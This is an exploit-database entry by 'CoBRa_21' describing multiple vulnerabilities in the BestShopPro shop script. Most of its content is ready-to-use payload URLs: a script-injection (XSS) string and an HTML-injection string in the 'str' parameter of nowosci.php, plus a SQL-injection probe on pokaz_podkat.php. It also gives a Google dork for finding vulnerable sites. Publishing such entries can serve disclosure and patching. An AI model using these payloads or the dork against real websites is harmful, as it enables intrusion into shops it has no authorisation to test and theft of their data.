BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities



EKU-ID: 23918 CVE: OSVDB-77757;CVE-2011-4812;CVE-2011-4811;OSVDB-76880 OSVDB-ID:
Author: CoBRa_21 Published: 2011-11-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


################################################################################################
#  Exploit Title: BST - BestShopPro (nowosci.php) Multiple Vulnerabilities
#
#  Author : CoBRa_21
#
#  E-Mail : uyku_cu [at] windowslive.com
#
#  Google Dork : "Powered By BST"
#
#  Script Page : http://www.bst.pl
################################################################################################
#
#  XSS:
#
#  http://127.0.0.1/nowosci.php?a=1&str=<script>alert(/CoBRa_21/)</script>
#
#  HTML:
#
#  http://127.0.0.1/nowosci.php?a=1&str=<font color=red size=15>CoBRa_21</font>
#
#  SQL :
#
#  http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL)
#
################################################################################################